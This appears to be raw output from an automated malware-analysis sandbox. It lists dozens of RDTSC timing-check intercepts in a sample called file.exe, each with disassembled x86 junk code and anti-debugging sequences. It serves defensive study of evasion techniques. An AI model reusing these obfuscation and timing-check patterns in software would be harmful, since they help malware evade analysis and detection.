Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD22C8 second address: BD22D3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD22D3 second address: BD22ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F568CECBB31h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCA72A second address: BCA72E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2832 second address: BD283E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F568CECBB26h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD283E second address: BD287F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C9h 0x00000007 jnp 00007F568CBD42B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007F568CBD42C3h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD3056 second address: BD305C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD305C second address: BD3062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD3062 second address: BD3076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F568CECBB2Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD3076 second address: BD307A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD31AB second address: BD31C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F568CECBB30h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9AF84 second address: B9AF90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA168 second address: BDA18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F568CECBB26h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F568CECBB37h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA27B second address: BDA28C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F568CBD42B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA28C second address: BDA290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA290 second address: BDA2A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F568CBD42BFh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA2A8 second address: BDA2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F568CECBB26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA2BB second address: BDA2EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jng 00007F568CBD42D6h 0x00000018 push eax 0x00000019 push edx 0x0000001a ja 00007F568CBD42B6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA2EA second address: BDA336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e js 00007F568CECBB36h 0x00000014 jmp 00007F568CECBB30h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F568CECBB37h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA454 second address: BDA46A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F568CBD42B8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA46A second address: BDA477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F568CECBB2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA477 second address: BDA48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push ecx 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop ecx 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDA48D second address: BDA4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F568CECBB39h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDD111 second address: BDD12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F568CBD42BCh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F568CBD42B8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDD12D second address: BDD137 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F568CECBB2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9CA47 second address: B9CA59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F568CBD42B6h 0x0000000a jl 00007F568CBD42B6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE03B6 second address: BE03BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE03BC second address: BE03F3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jng 00007F568CBD42B6h 0x0000000d jmp 00007F568CBD42C9h 0x00000012 jmp 00007F568CBD42BFh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0565 second address: BE0569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0569 second address: BE058B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C7h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0B94 second address: BE0B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE0CCD second address: BE0CD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2EE2 second address: BE2EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2EE6 second address: BE2F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 0D72535Eh 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F568CBD42B8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 cld 0x00000029 push A61B0352h 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F568CBD42BBh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE324C second address: BE3272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F568CECBB30h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE3412 second address: BE3416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE3C7A second address: BE3C7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE3C7E second address: BE3C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE3C84 second address: BE3C89 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE3EFD second address: BE3F3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F568CBD42C2h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F568CBD42C1h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE40E3 second address: BE40ED instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE40ED second address: BE40F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE40F1 second address: BE40F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE511A second address: BE511E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE511E second address: BE5122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE5122 second address: BE5134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jbe 00007F568CBD42C4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE5134 second address: BE5138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE5138 second address: BE517C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F568CBD42B8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov edi, 6C55FBFAh 0x00000026 mov esi, dword ptr [ebp+122D1D78h] 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+122D37C2h] 0x00000034 push 00000000h 0x00000036 mov dword ptr [ebp+122D1D83h], esi 0x0000003c push eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push edx 0x00000041 pop edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE517C second address: BE5180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6204 second address: BE620B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE620B second address: BE6263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F568CECBB28h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov si, 9F19h 0x00000028 push 00000000h 0x0000002a jp 00007F568CECBB39h 0x00000030 push 00000000h 0x00000032 mov si, bx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push esi 0x00000039 pushad 0x0000003a popad 0x0000003b pop esi 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6263 second address: BE6269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6BF2 second address: BE6C0A instructions: 0x00000000 rdtsc 0x00000002 js 00007F568CECBB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jp 00007F568CECBB26h 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE69C5 second address: BE69D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6C0A second address: BE6C8F instructions: 0x00000000 rdtsc 0x00000002 je 00007F568CECBB28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007F568CECBB33h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F568CECBB28h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e sub dword ptr [ebp+122D1CB1h], ebx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007F568CECBB28h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 00000017h 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 push edi 0x00000051 call 00007F568CECBB2Bh 0x00000056 mov dword ptr [ebp+122D25C3h], eax 0x0000005c pop edi 0x0000005d pop esi 0x0000005e push eax 0x0000005f push edi 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 pop eax 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE69D2 second address: BE69D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6C8F second address: BE6C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE69D6 second address: BE69DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE770D second address: BE7721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F568CECBB2Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE7721 second address: BE7745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F568CBD42CAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE9703 second address: BE9726 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F568CECBB38h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE9726 second address: BE972F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE972F second address: BE9790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F568CECBB26h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F568CECBB28h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 xor di, AF7Dh 0x0000002c stc 0x0000002d push 00000000h 0x0000002f movsx edi, dx 0x00000032 mov di, ax 0x00000035 push 00000000h 0x00000037 sub edi, dword ptr [ebp+122D2DE6h] 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F568CECBB36h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE9790 second address: BE97AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F568CBD42B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE97AB second address: BE97C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BED76C second address: BED771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BED771 second address: BED785 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007F568CECBB26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEED0F second address: BEED6F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F568CBD42B8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 je 00007F568CBD42BCh 0x0000002a sbb edi, 6A1D1960h 0x00000030 push 00000000h 0x00000032 clc 0x00000033 push 00000000h 0x00000035 mov edi, dword ptr [ebp+122D2D86h] 0x0000003b xchg eax, esi 0x0000003c push edx 0x0000003d jns 00007F568CBD42BCh 0x00000043 ja 00007F568CBD42B6h 0x00000049 pop edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F568CBD42C0h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEFD6D second address: BEFD71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEFD71 second address: BEFD77 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF0F54 second address: BF0F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF1F42 second address: BF1F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF1F46 second address: BF1FA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d adc bx, 3E22h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F568CECBB28h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D25F4h] 0x00000036 movsx ebx, bx 0x00000039 xchg eax, esi 0x0000003a jmp 00007F568CECBB2Ah 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F568CECBB2Bh 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF1FA5 second address: BF1FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF3066 second address: BF3081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEDEF2 second address: BEDF9A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F568CBD42B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F568CBD42B8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 jmp 00007F568CBD42C2h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 sub dword ptr [ebp+122D1E23h], edi 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov eax, dword ptr [ebp+122D03CDh] 0x00000046 push 00000000h 0x00000048 push ebp 0x00000049 call 00007F568CBD42B8h 0x0000004e pop ebp 0x0000004f mov dword ptr [esp+04h], ebp 0x00000053 add dword ptr [esp+04h], 00000017h 0x0000005b inc ebp 0x0000005c push ebp 0x0000005d ret 0x0000005e pop ebp 0x0000005f ret 0x00000060 mov edi, 359B2700h 0x00000065 xor dword ptr [ebp+122D2057h], ebx 0x0000006b push FFFFFFFFh 0x0000006d jmp 00007F568CBD42BAh 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F568CBD42C9h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEEE6E second address: BEEE72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF1102 second address: BF1108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF1108 second address: BF1117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF5298 second address: BF52B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F568CBD42B6h 0x00000014 rdtsc
